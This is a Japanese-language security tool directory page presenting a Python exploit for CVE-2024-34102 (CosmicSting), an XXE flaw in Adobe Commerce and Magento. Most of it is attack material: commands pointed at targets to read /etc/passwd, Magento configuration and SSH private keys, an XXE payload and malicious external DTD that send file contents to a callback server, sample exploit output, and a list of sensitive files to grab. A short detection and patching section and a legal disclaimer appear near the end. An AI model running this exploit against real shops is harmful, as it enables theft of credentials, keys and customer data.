Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-34102 — CVE-2024-34102 エクスプロイト(python3 用) | Kitploit
ツール/GitHubGitHub/nmmorette/cve-2024-34102
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

CVE-2024-34102 エクスプロイト(python3 用)

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-34102 - CosmicSting XXE エクスプロイト

Python Version CVE

CVE-2024-34102 (CosmicSting) のエクスプロイト - Adobe Commerce および Magento の XML 外部実体 (XXE) 脆弱性。

📋 脆弱性について

CVE-2024-34102 は、以下に影響を与える重大な XXE (XML 外部実体) 脆弱性です:

  • Adobe Commerce バージョン 2.4.7、2.4.6-p5、2.4.5-p7、2.4.4-p8 およびそれ以前
  • Magento Open Source (同じバージョン)

この脆弱性により、認証されていない攻撃者は以下を行うことができます:

  • 📄 サーバー上の任意のファイルを読み取る
  • 🔐 認証情報や機密設定を外部に送信する
  • 💾 データベース情報にアクセスする
  • 🚨 任意のコードを実行する (一部のシナリオ)

CVSS スコア: 9.8 (緊急)

🎯 クレジット

このエクスプロイトは、以下によるオリジナルの成果に基づいています:

  • @Chocapikk - オリジナルの CVE-2024-34102

このバージョンでの改良点:

  • ✅ カスタム動的 DTD サーバー (fars.ee への依存を回避)
  • ✅ 自動デコード対応のコールバックサーバー
  • ✅ 必須パラメーターの検証
  • ✅ 外部サービス向けのリトライロジック
  • ✅ より詳細なエラーメッセージ
  • ✅ コールバックの HTTPS 対応
  • ✅ Python 3.8+ との完全な互換性

🛠️ 要件

  • Python 3.8 以降
  • DTD ファイルをホストするサーバーへのアクセス (VPS、Burp Collaborator など)
  • コールバックサービス (Burp Collaborator、Oastify、または独自のサーバー)

📦 インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102

# Install dependencies
pip install -r requirements.txt

🚀 使用方法

方法1: fars.ee を使用 (自動)

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com

方法2: 独自の DTD サーバーを使用

ターミナル1 - DTD サーバー:

root@kitploit:~
sudo python3 server_dtd.py

ターミナル2 - エクスプロイト:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com \
  --dtd-server YOUR-IP:8000

方法3: 独自のコールバックサーバーを使用

ターミナル1 - DTD サーバー:

root@kitploit:~
sudo python3 server_dtd.py

ターミナル2 - コールバックサーバー (自動デコード):

root@kitploit:~
sudo python3 callback_server.py

ターミナル3 - エクスプロイト:

root@kitploit:~
python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c YOUR-CALLBACK-IP \
  --dtd-server YOUR-DTD-IP:8000

📝 パラメーター

必須:

  • -u, --url - ターゲット URL (ベースドメイン)
  • -f, --file - サーバーから読み取るファイル (例: /etc/passwd)
  • -c, --callback - コールバックサーバー (IP/ドメイン)

任意:

  • --dtd-server - DTD ファイルをホストするカスタムサーバー
  • --https - コールバックに HTTPS を使用 (デフォルト: HTTP)

🎬 使用例

/etc/passwd を読み取る

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /etc/passwd \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

Magento 設定を読み取る

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /var/www/html/app/etc/env.php \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

SSH キーを読み取る

root@kitploit:~
python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /home/ubuntu/.ssh/id_rsa \
  -c abc123.burpcollaborator.net \
  --dtd-server 192.168.1.100:8000 \
  --https

🔍 動作の仕組み

1. 帯域外 XXE (Out-of-Band XXE)

このエクスプロイトは、データを外部に送信するために帯域外 XXE 技術を使用します:

root@kitploit:~
<!-- Payload sent to target -->
<!DOCTYPE r [
  <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

2. 外部 DTD

ターゲットサーバーが悪意のある DTD をダウンロードします:

root@kitploit:~
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">

3. データ外部送信 (Exfiltration)

サーバーは XML を処理し、ファイルを読み取り、base64 でエンコードしてコールバックサーバーに送信します:

root@kitploit:~
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...

4. デコード

root@kitploit:~
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d

📊 出力例

root@kitploit:~
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http

DTD will be dynamically generated with:
[*]   Callback: http://abc123.oastify.com
[*]   File: /etc/passwd

DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...

=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>

To decode the exfiltrated data:
[*]   echo 'BASE64_STRING' | base64 -d

[!] Check your Burp Collaborator or Oastify dashboard now!

🛡️ 検出と緩和策

防御側向け:

検出:

  • /rest/V1/guest-carts/*/estimate-shipping-methods エンドポイントへの HTTP リクエストを監視する
  • 外部実体 (<!ENTITY>) を含む XML ペイロードをアラートする
  • 不審なドメインへの外部接続を検出する

緩和策:

  • パッチ適用済みバージョンへ更新する:
    • Adobe Commerce 2.4.7-p1、2.4.6-p6、2.4.5-p8、2.4.4-p9
  • XML パーサーでの外部実体処理を無効にする
  • アンチ XXE ルールを備えた WAF を実装する

ペンテスター向け:

テスト対象の注目ファイル:

root@kitploit:~
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ

⚖️ 法的免責事項

root@kitploit:~
このエクスプロイトは、教育およびセキュリティ研究の目的でのみ提供されます。

明示的な許可なしにシステムをテストするためにこのコードを使用することは違法です。

あなたは自身の行動に対して単独で責任を負います。以下の場合にのみ使用してください:
✅ 自身のテスト環境
✅ 承認されたバグ報奨金プログラム
✅ 契約済みのペネトレーションテスト

以下の用途では使用しないでください:
❌ 許可のないシステム
❌ 許可のない本番環境
❌ 悪意のある活動

作者はこのコードの誤用について責任を負いません。

📚 参考情報

  • Adobe Security Bulletin APSB24-40
  • CVE-2024-34102 の詳細
  • OWASP XXE 防止
  • Chocapikk によるオリジナルエクスプロイト

⭐ このプロジェクトが役に立った場合は、スターを付けていただけると嬉しいです!

ツールをダウンロード